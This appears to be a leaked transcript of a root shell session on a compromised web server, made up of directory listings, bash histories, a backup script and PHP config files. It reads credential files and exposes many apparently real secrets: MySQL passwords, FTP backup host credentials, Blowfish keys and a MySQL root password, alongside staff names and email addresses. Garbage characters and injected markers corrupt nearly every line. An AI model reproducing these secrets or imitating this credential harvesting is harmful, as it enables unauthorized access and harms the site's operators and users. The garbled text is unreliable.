sh-3.2# cat /etc/motd; d, u* n T0 g* ~% G2 t% m( c4 r
#####################################################7 G+ d/ S' y) V; G
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ ## K7 }$ B1 A0 t3 h, [8 k/ r! U4 H
# |__| [__ | |__| | |__| | | | [__ | |__| #
1 f% Z- Y/ H3 w3 L# h1 d- R8 P# | | ___] | | | |___ | | \/ | ___] | | | #% N) y5 g; E0 ?! `! k' F2 O
# #
) B: B" {1 G9 |4 v1 O; d; z#####################################################9 f1 J. W4 Q1 i- H
# #
! s+ U( B; H. G) u$ ^! ^# Admin Contact - 链接标记support@secureservertech.com #
$ v2 @2 o* Q( T. a8 e8 Z0 w$ N, \# #: U ~& b; R: R8 ]+ ^1 e4 W# c
# Available ShortCuts #
1 }+ Y* s* k, d. J8 v# #! w$ H2 l* k, c0 W: ~7 E" X8 {/ C
# nst - list active connections #/ g' B$ V$ o4 U6 A8 b. `+ P
# ddos - shows how many times each ip is connected #
1 p/ P5 S, s T" t& B8 m0 c# ltr - restart the webserver #
! v* a6 ~9 i6 Q: Z' ]+ ]4 U/ }# phpc - edit the php config file #
+ M3 W* Q- Y2 ?7 m% ?. i0 Z# htc - edit the webserver configuration file #
8 [5 d( ~# l0 _% r# up - uptime #' @4 \" y" o4 o' q
# etd - edit the motd of the day file #
7 C9 h$ k) o. i$ f0 j" v# htr - start and restart apache if needed #
2 v" L1 ~/ G* f4 M9 q) O; i# syng - shows active SYN_RECV connections #
9 l! @" w) X$ h% S) ?& a# synd - syn flood blocker - “synd -h” for usage #* h! L( ]& e. a; \& y
#####################################################
# I7 y: z( L# m+ f# NOTES: #1 l/ Y( O/ T" | V; R2 g! O- Q
# Last Upgrade - 12-08-2008 by JF #; a5 [6 N4 R j7 f; c
# My.cnf/Mysql Optimization - 1-28-09 #
* l) c C, T. b; F# #8 k: J/ o4 ?3 X& F( a+ e
# #
7 ]" a9 _' Y- A( z, z8 Q# #
J+ z7 L& B) S* W6 I% e. L#####################################################
0 d6 U& Q3 k) ~0 Z3 i6 M) J8 g: l" t7 v: \! ^) A$ Q7 D
sh-3.2# lastlog | grep -v Never
3 Q- Y' V5 s/ B% S- e( AUsername Port From Latest+ {+ Z3 ~, N$ z& R2 R7 h& _* }
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009# l$ \8 l5 s6 k9 L. I9 l
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 20083 h/ p1 d8 N5 `2 r3 U7 ~8 w- ]2 ~
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
& W9 d# r7 l" T! a7 Nastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
- i# M4 L" d* T5 z
- u* b( p- N& t# t& K7 Osh-3.2# ls -la
% u0 W4 [; F0 B" z5 y* p- ?2 ptotal 453376' a' h/ x$ A& i
drwxr-x— 15 root root 4096 Jun 4 08:40 .+ e6 x f) e) w: Y1 s8 n2 f7 L
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
/ l0 C% d5 T6 N, D! Y: y) J0 |' G5 @" V-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip3 Z6 l- G5 J6 {, d1 @! O& D
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg8 I; }( s* _% I5 F7 h z
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
. `2 |; j* [( l( M" a- _* c9 R: E-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout' U4 P" ]( |" {& ~) g7 R" l |
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile. C- k& }6 W L7 b0 E+ D! c
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc; \# E% N% }) u5 P T' ~
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh( o. g9 o3 G# p% A) q2 a
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
@+ R+ t; P1 L* @-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql- A W5 p% q6 z/ \" M6 D: x
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan. B! a* C0 c) P( ]9 O
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
5 O3 l# M1 ]" |: y-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
/ ?5 ?6 I- R) U) m- I# X- m- x! Kdrwx—— 2 root root 4096 Oct 28 2007 .elinks
2 }8 ?0 U; G! P* _$ B2 }drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1# v) i% E$ D, B4 r2 N+ S }
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
! `& f# b6 W4 ]( `/ u& c& q. L-rw——- 1 root root 0 Apr 16 13:19 .history, n# \* H" { D; Z. z% q( g
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log0 `, K! p( ?6 k" ?7 e7 ^: n: W" [
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog! {' v3 K9 b! K6 n; c
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh5 g R' Y0 ~: V8 F4 l* D0 w, D% x' W
-rw——- 1 root root 35 Jun 2 14:23 .lesshst2 O$ P2 ~/ _8 o+ i# o' f- k7 D) }
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
) g( q3 Z, s- L I' d& R$ sdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec6 y' p# _5 B/ u
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz1 c7 q+ o+ m6 a. N4 U I& |
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2# c% k: x0 A+ }* \5 s+ z! ^3 m
-rwx—— 1 root root 760 Sep 18 2008 lp
7 f, u! Y" q( c' w( A" z/ Udrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
0 {. v ]: k" b6 E& k( x7 {7 u-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz. R% ?0 g- K) o p2 `
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1" ^/ V1 I, g$ s
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
* j" j- k0 U# y% v1 j# x+ d-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz, J+ S/ M# V% f" z. Y% ?, A- |
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3/ Q4 O: e$ ^3 d1 l6 p
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz0 R9 U- x/ Q m1 j. o, ?' ~
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
( P! A! A& Z: }) k0 O-rw——- 1 root root 41 Oct 19 2007 .my.cnf
+ [( Z, ~4 O& s# E( R6 a/ r-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history5 Q2 {( Q4 w* o! P
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport# z6 V4 z3 P, ~5 p a3 b
-rw——- 1 root root 41 May 20 2008 .mytop3 f8 b! ~1 m! |
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
- H6 f, E5 X2 P-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz: R) ?: e: W7 q9 e" ]
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
6 x- {1 t1 {+ k% O7 f$ i-rw——- 1 root root 1462 Sep 21 2007 opt.php( {( N6 m1 y7 F7 K% F! v
-rw-r–r– 1 root root 3371 Sep 22 2007 p& Q+ `. _$ d7 p6 X) M; A
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
* n, b$ A, s; Q' i-rw——- 1 root root 1024 Feb 3 21:32 .rnd8 R8 M6 ]$ n% W" f5 ?
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
: |/ b& c) z* K4 }" w+ X# \-rw-r–r– 1 root root 887 Nov 28 2007 server.key
) |% i/ A* t' ~% tdrwx—— 2 root root 4096 Oct 10 2008 .ssh: {7 v" ~; f. C3 p4 n; T
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat" A- D% ~- v- p( K! C1 e& w
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc# p8 t& B2 e0 }0 V$ D; v; N! f* Q
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
8 V' w) |7 ]* k+ W-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
1 V4 J" Y- y A9 C$ U( ?7 Adrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
: N/ H. K9 h0 c8 z4 b- K-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh2 f, o* G: u/ R
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.00 X/ |) M2 J. _
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
! i, c# h+ h7 |! ]4 {. s: `/ ^-rw——- 1 root root 12997 May 16 2008 .viminfo
' k: f) W: U T% r- I
+ w* u: c' H' U* }sh-3.2# cat .bash_history+ y0 f- s J2 q* x
[snip]8 j% e9 J5 k7 h
wget cp4sst.com/sstlinux.tar.gz
/ L( I4 c3 S( ~0 ~! ]8 u C0 qtar zxvf sstlinux.tar.gz
# s, z. }6 w k/ q- h0 acd linux-2.6.27.10
+ j( j6 F }# S* W7 `) u9 ~sh install.sh+ D$ w$ ]5 W- f7 S; U0 x
make bzImage ; make modules ; make modules_install ; make install
3 j( q t5 v1 ~( y7 @make clean
7 v" `6 p$ c: qservice mysqld restart( X w/ w+ M5 n, W0 Q8 y6 N6 Z d
[snip]
4 G3 u2 M0 @0 A: c, jcd /usr/sbin/
1 B' g4 c& ^! k* cchmod 4777 traceroute$ g# B$ Y6 T; P/ g
chmod 4777 ping4 B8 h: }* c: z+ p! p& P
traceroute -I 链接标记[url]www.astalavista.ch[/url]7 _% P5 }, ?1 e
[snip]
* B3 L4 E! }; g9 \- P; zvi /etc/csf/csf.conf! `0 m; ?) Y4 H9 w
traceroute google.ch9 v7 {1 H! K t
service csf restart/ ]) g; i# O* I3 |' x
tracert google.ch
& J( o' j o* o: H4 X( J/ p; c$ Pservice csf restart1 Z. X6 Z% }; @2 t
traceroute 链接标记[url]www.google.ch[/url]% G& [! Z# U1 A4 R0 i9 L [4 r
tracert 链接标记[url]www.google.ch[/url]! G$ p2 @0 j" ~# |
traceroute 链接标记[url]www.google.ch[/url]/ E3 X( K6 `1 b q# ]2 H
locate traceroute1 Q: \% {1 m. n# Q v$ E
chown 4755 /bin/traceroute
" H% C1 E0 V* p' \chown 4777 /bin/traceroute
4 Y& c: z: x. m H7 ~: j4 Glocate ping
' P! t2 [; S3 L$ G* `0 L: r# s; ]5 P5 achown 4755 /bin/ping
# W* m, a8 e ^+ D- A6 A6 z# h0 p. ~chown 4777 /bin/ping6 i' r. ^) n) \; _& g
cd /bin/. \9 @: v) R% y7 d t
ls -ali | grep ping
) B! C; p$ G! F) }0 {1 Echown root ping
; Z/ B3 g' V: e( S7 H1 Gchmod 4755 ping
, D( @" L F3 F5 F& bls -ali | grep traceroute! R$ V4 a2 B Y8 w, R6 e2 e. w
chown root traceroute
4 [% ?, Z& e' [9 L$ p# ~chmod 4755 traceroute: z, M, K; D" M: `/ R+ {/ t
ls -ali | grep traceroute
' Q) o) f- w# `traceroute -I 链接标记[url]www.google.ch[/url]. W8 ?0 \' K8 _+ o+ Q' @' ?
traceroute 链接标记[url]www.google.ch[/url]: F2 b2 }) O: Y* U8 e9 ^. T% h
whois pmsantos.ch- M( X# x' e" X$ S* B
[snip]& b, A% |) u* b5 ?" K6 `
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
% M( c1 _6 c7 @0 a9 B4 L i7 jmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql5 P/ P5 P, o! Z4 L
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
6 D- F1 l6 D7 l* Y- m" mmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql6 F6 R2 p/ u& W
top
$ ]0 ?+ T; d# j F8 M* ?3 O- H$ M6 Cping ssth.ch
% O/ R& U& w# [( g. Oping asdlkfaljgasd???ljg???lasj.ch
- E; P$ b8 u. j. ]% r6 aping asdlkfaljgasdlasj.ch
y; V3 r) F/ ?9 O/ i# gping 链接标记[url]www.ssth.ch[/url]
* k! V: z% x7 K" K+ Dping ssth.ch2 Q( Z8 R- L* t: w0 Y- k4 W( j
nslookup 链接标记[url]www.google.ch[/url]* V f- |2 g3 k1 M) D2 W
nslookup 链接标记[url]www.ssth.ch[/url] U' \9 g# k) g# g
man nslookup
! s! Y% f4 c) ?# E+ ~ping 链接标记[url]www.google.ch[/url]* o6 O8 ~2 c+ y8 H0 x5 W. H2 d U
nslookup 链接标记[url]www.google.ch[/url]7 Y: {7 c$ G. i, U$ Z
nslookup 链接标记[url]www.google.ch[/url]
8 ]& Q# D# m) {$ f( onslookup salfjasdlf.ch
# H7 t X' [4 [' D8 D! j S[snip]
- h/ |) ~& v5 X+ K$ B/ Wopenssl passwd -1 sadf& ^ c% E8 t+ A' k' c
openssl passwd -1 5cZNHstdTy: C: C o; R$ j9 r' B
mysql
1 w9 w* {* H$ H. ]$ xmysql
$ }8 t; {! L+ J; `locate proftp' j( [( B6 \. j
vi /etc/proftpd.passwd
; y- P) s9 ]8 Z |, K" [7 W/ R. gservice proftpd restart
% W( \2 l* I9 olocate proftpd.conf; ]9 C( u) P( P9 t
vi /etc/proftpd.conf0 k0 Z7 L" X4 B: Z- Y& V3 y. X
vi /etc/proftpd.passwd a3 ^! h0 f7 p w/ Y
service proftpd restart
8 {. q2 p6 A# D3 |! a8 @ r[snip]4 G& r2 Y9 k% i) H* K4 f
/bin/sh /home/com/backup_system/backup.sh$ n N9 Q8 q# g9 e5 r3 n
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin- D+ g8 I3 L2 O0 _+ w- S& \
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql6 i+ V k m" j
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
$ b: s/ }; V! P Els -ali3 y' I9 }% A( U& x I0 v1 Q5 I
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql! \6 F* @) r' ?9 m3 _* y4 m
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
9 [! U. A( t# C8 U& n( mcrontab -l
/ P! s% F% Q* x1 [" J7 P% Hcrontab -l" n; g z0 ~4 D" u8 [* u) P6 e
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
$ D/ P1 @) W; k% a0 N5 l; y$ s/home/com/public_html/modifications/cronjobs/exploits.sh
l/ D4 V5 N) E% c0 pwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url] l6 }6 x; Z8 F$ r
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
) V2 ~, w- @5 U4 Ccd lsws-4.0.3
* \; F8 F/ n! T8 Msh install.sh2 G4 C( l1 @" Q- S" R
uptime
' e( |" O8 ?, @0 nhdparm -tt /dev/sda
# f1 |; p1 E& @; p+ I' x ziostat, t) U+ f# x5 K9 T
yum install iostat
' R- H$ k% \2 ^* i9 E: B7 Piostat4 y4 c, d: t I
whereis iostat
5 n) l: y1 e- d* Q7 P0 Hyjm clean all: o& Y) r8 o' f6 v" [, l- F
yum clean all ; yum -y update
5 o& n! F% q# ]) I; Ziostat
: a& N) y7 b# J( l9 v, _4 nyum install systat
! g; k+ x6 O& k4 \rpm -qa | grep iostat
. c4 [: P+ v$ Irpm -qa | grep sysstat) a2 r( k- s, B: G
rpm -qa | grep systat
& ?* K5 ?% u8 J/ |1 [dmesg -c
4 z3 [- K+ o) _9 c; ^3 _- Hsysctl -p
6 _) c; M9 Y3 n2 h5 ~6 T& Guname -r2 R; q9 c/ C; _: e+ q( {6 d8 M
cd /usr/src
}3 m; ]1 t1 F! S( Wwget nix101.com/kernels/sstlinux.tar.gz
' Z8 i2 Y3 J( S/ l& x7 J7 Y, ?) jshutdown -r now
& y* k- A/ { B5 V- bnano -w /boot/grub/grub.conf
; X3 ]$ W7 g' s% V' C) K1 ~
' l& I3 O7 v8 `9 j3 msh-3.2# cat .my.cnf9 C8 X" d2 f O
[client]/ B$ [) H1 }$ |( d
user=da_admin
1 ^0 ?0 `/ D U9 w: t N: Spassword=X9dctmRH
, ~; S; G. G& ^) B4 N: I8 B0 _* ~$ t! I7 L* l$ o& [# a& K8 o
sh-3.2# cat /home/com/backup_system/backup.sh
7 s" a/ C1 |4 p#!/bin/sh p( ?% P: u" k
#####################################################################
" I a& W& S" j0 A( A# #
7 \* E3 B; ]; k; G# incremental backup for astalavista.com #
/ D" p# E5 ~! L% B/ v# #+ _; z- O8 s5 b8 F
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
0 a( [4 X9 Y0 Y; T/ X# #& B) m$ {, Q2 ~9 y
#####################################################################
: |- y+ M' H! a- e[snip]
# Y. D1 `* t1 `. X" @9 _( SPROG_DIR=”/home/com/backup_system”;6 ? [/ N4 W$ I
BACKUP_DIR=”/home/com/backups”;
8 ` Z3 B) u8 a' t% V0 dDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
* G. x$ }* c; i( O8 N# ftp for synology backup server$ {+ Q7 J& Q. o; n. Q1 X
FTP_HOST=”212.254.194.163″;! i' ]9 r0 S- R- {; j5 ?% F; b
FTP_PORT=”21″;
) c2 ?" o; f; ?' |7 H: GFTP_USER=”astalavista.com”;
2 o+ j2 h4 c( ?( cFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
* B$ _2 n" \$ c. |& J0 IFTP_DIR=”/astalavista.com”;, o5 ]" x Z& t
# database3 A( j& N8 E$ O8 p/ `) ^' P1 p
DB_HOST=”localhost”;* _2 @; `" D3 `( c6 H
DB_USER=”contrexxuser2″;/ \' i1 j# o V4 j7 q
DB_PASS=”0fEYNZgXz1pKe”;
& {; g8 W0 s& n I$ ~ x1 j0 `DB_DATABASE1=”com_contrexx2_live”;2 G/ G7 U1 A: M
DB_DATABASE2=”com_contrexx2″;
, n$ U! {0 l7 c ^. i8 U3 l2 `" Q[snip]
: x5 h# Q }% m6 dftp -in $FTP_HOST $FTP_PORT <<EOF
# t3 c! O* U1 h! _1 b1 [quote USER $FTP_USER/ [; W6 E5 y. Q. d: ?! x" n; Z
quote PASS $FTP_PASS, o6 @+ Q( {5 l2 I4 {; a
cd $FTP_DIR
4 T$ l% f! P0 h v$ g& lput $DB_FULLNAME-SQL_Dump.tar* f6 g- M# x5 B' g
put $BACKUP_FULLNAME-Public_HTML.tar
; n( X+ K: I6 S t3 s( _ ^0 Qclose
, H2 g, f; l3 f+ e* m! Ybye
: o, Z& ?: e' x v* uEOF: L! z, W9 l- ^5 o/ ?9 o
1 y: b) M' e9 _
sh-3.2# cd /home. \+ T; |( O2 O( p' ]0 y3 e5 n3 T8 T/ v
sh-3.2# ls -la
! a5 y4 c5 j0 btotal 120, x8 g9 Z* J' \& |. b
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .) o9 |8 k# {7 s o
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..# J) f) s" [- L* T+ T
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin- m; \3 @* |' i! K" ], f7 G
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
1 m. B8 N- y$ p9 o {. e. |-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
7 O5 F7 n, z$ c" \drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
& d; [$ d% u: x# q6 V* t! U! u3 Qdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
- `* {2 R0 z, F+ g! c1 f, @, i) ddrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161) A7 c' Y! c. X; c0 P- [2 q
drwx–x–x 10 com com 4096 Apr 28 12:40 com
4 w6 N: d) D& H" M! @drwxr-xr-x 2 root root 4096 May 17 2007 ftp& q, X# U1 j7 e( Z$ |2 E7 h7 [0 y
drwx—— 3 jon jon 4096 Sep 21 2007 jon& U& ^# |% G( M$ M8 {* Y# V
drwx—— 2 root root 16384 Sep 11 2007 lost+found
, F" \2 X5 R( ?drwxr-xr-x 2 root root 4096 Sep 14 2007 my
+ r8 Z5 k5 {* G* Sdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata& n$ D3 L' J+ D9 G
drwx—— 2 jon jon 4096 Sep 15 2007 test. m% S- Z) c" _5 e: S* S' t6 I
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp. N* B. W6 K7 A* a5 r8 \& K9 t
+ G. K* g @, ^% M/ T7 B
sh-3.2# cd admin
( A' ^( E4 ~# E$ [0 B2 W" ~1 Osh-3.2# ls -la
( q' t0 m+ p0 ~9 |0 l' }0 e& Gtotal 1735896$ |" d/ E& G. O. s$ O7 Q( c3 n" z
drwx–x–x 9 admin admin 4096 Nov 28 2007 .) R1 q1 s0 D6 a9 k8 X, ~
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
* J9 T: z9 F0 s7 @- m0 N3 R( f& idrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
' D$ t) e8 n# F9 Tdrwx—— 2 admin admin 4096 Sep 28 2007 backups& ^1 N, O/ {% I
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
5 d- D& z' \- _- e1 V6 j) E% K-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
- t( Y7 ~& ~; D7 R, z-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
' {* D# F! q7 p$ W% q# q-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
1 J( e. y6 G5 U! t+ W2 P# p0 h1 @. Mdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
2 H5 P+ y2 \8 T* {# U6 `drwx–x–x 6 admin admin 4096 Sep 21 2007 domains' R" @/ u" G6 H. Y, F- ?; u: \
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap% ]/ b* p9 e' T: v
-rw-r–r– 1 root root 24 Sep 21 2007 info.php8 J' _$ B) d( u% L4 l$ d& J
drwx—— 2 admin admin 4096 Sep 21 2007 mail2 X9 n6 h) d1 @, ]" @' ?8 l
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr& e5 F. N% S6 T
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
" W+ K9 k/ A* O-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow6 M; T$ K( f8 O4 g7 m" @4 k; o
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
1 P+ k' h# m: X3 y0 z6 i% @drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups! t8 Z/ b3 t# e) Z& m
: p% e+ o: b, T; ~. t9 o
sh-3.2# ..
. ?% g5 C, [. R2 A9 t5 dsh-3.2# cd jon
! ^, r6 A( L( v8 V. hsh-3.2# ls -la
# H) ^/ h! P) c* z! Qtotal 36
" k1 i2 C# d; ~$ wdrwx—— 3 jon jon 4096 Sep 21 2007 .
0 G7 L5 K4 l$ Cdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
6 w, I3 g `- r M6 P-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
4 n# u. n# i5 @. m' N) \% I! \! B( S-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
3 L4 h' ]/ p! T6 t M+ a-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
6 M+ p4 a" D0 n1 v9 L' G-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc. T9 |, z7 F6 ~7 h- g+ T' V& h
-rw-r–r– 1 root root 24 Sep 21 2007 info.php8 q+ J: L1 V* u
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html+ ^1 e% s5 t7 h/ A7 V" E, v
, v" p7 m) E6 H' w0 a" r
sh-3.2# cd ..' u0 N. ^; F" E3 h g5 I
sh-3.2# cd test% R1 f: j A( [) [0 g0 u# E
sh-3.2# ls -la% g, M# K' R( N+ v- E3 S$ h. i
total 48' i5 Y. l# X& E3 u# s4 ^
drwx—— 2 jon jon 4096 Sep 15 2007 .
+ ^( N0 }/ t" q3 H' f% r( xdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
, @8 n% j8 I6 J# T) C: F4 W-rw——- 1 jon jon 79 Sep 21 2007 .bash_history" @ j) J) n+ g4 x) H
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
! R4 g$ Y( P6 |2 x* l' w3 p7 T" O-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
. o* k" C( R6 W9 w- P2 C-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
' q/ O: s$ N1 o0 C# T9 `( Tsh-3.2# cat .bash_history$ [# D( m% c& U( y
/usr/bin/mysqladmin -u root password PoliuJhytg67' P8 S. k& F/ h% d
& O# g, ~, m" zsh-3.2# cd ..
, V2 m3 N e5 }3 psh-3.2# cd astanet
2 ^4 e7 s8 i8 P4 `0 M3 |sh-3.2# ls -la$ }& z6 H( V* J1 }( p; W
total 52
# k! W, ^$ H5 A8 m0 }: w7 Jdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .. v# m$ \0 q7 t* x) C
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
, j. E! b) B$ F# ~$ ^6 b! x" bdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth% b& l [. @6 {$ T8 [
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
& b& Q- k3 }/ L; \$ [5 p2 ?-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout+ e" P1 |7 e6 g
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile9 ~2 @ r5 w( V( \$ h+ ]
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc3 |0 L- {9 u: W$ e1 k0 E1 Q
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains7 R( k H' T, P3 H- W1 A
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
) z1 j5 b+ C; h* S/ W8 hdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail# ^9 J9 o* y5 O* s [, M2 G8 V+ W
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
7 U$ B5 v! z. u" f6 P7 I% M3 Flrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
3 z+ Z' y. B- e+ l-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow6 z0 @- X# j) f2 ~
_. o: _# _& D0 {$ |6 qsh-3.2# cd auth/
1 i% m( j1 Y. q& t0 _( j! vsh-3.2# ls -la
2 F, S' P$ n6 S3 j4 Htotal 28
5 z3 ~6 M/ @- p) b" ?# B, bdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .0 `0 e8 M: e2 k- r
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
( v6 Q: i7 g( s1 x3 `' L* N-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
; \. |$ L4 j1 n( g- A-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php6 W0 q O4 N4 I& ?. y$ E
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd4 P" \. A) E7 i9 l7 R* g
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting. c+ n; N2 |9 f6 A/ M
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
% }: _6 V0 n$ F& v: l
4 a/ T/ W/ T& D zsh-3.2# cat hackercontest.config.inc.php; `: s: E, }) K) l* ?8 E
<?PHP
5 Z, J( u) X" m" X1 g$ Q+ C// Variabeln f?r Verbindung zur Datenbank //3 G) J, B: R+ C8 H
$conxHost = ‘localhost’; // MySQL hostname3 n# Y. y+ u C: p8 w" n
$conxUser = ‘hackercontest’; // MySQL user7 H+ q+ U, }/ g8 \. y- d; O
$conxPassword = ‘K6m@7dUc’; // MySQL password# k- }* N( D: f9 K+ d* S4 B
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
! G8 [5 H0 s+ ^9 J2 v5 v: o?>
8 _9 h. g; m0 a$ Ksh-3.2# cat hosting.config.inc.php
1 [' }- ?" L! }& ?<?PHP& t/ Y) `( x7 G. W+ M
// Variabeln f?r Verbindung zur Datenbank //
9 t3 C. W4 t r) [- _$conxHost = ‘localhost’; // MySQL hostname
+ a/ {/ o) d& c. C4 V& c! {2 D$conxUser = ‘hostinguser’; // MySQL user
$ G7 q$ V/ f8 `( w; k/ E$conxPassword = ‘cXvB3981′; // MySQL password
' {+ e! B6 V2 P9 y5 b$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
1 c! Y6 r, D: z; F, N% R4 H2 L?>
: Y4 W0 E+ Z/ w' ^ L, V# B5 j; `- N6 q1 B$ E* L3 F6 r
sh-3.2# cd ..+ z) w. B' T! x1 k6 R
sh-3.2# cd com4 A: v& o2 M) i) f; |0 v+ G
sh-3.2# ls -la
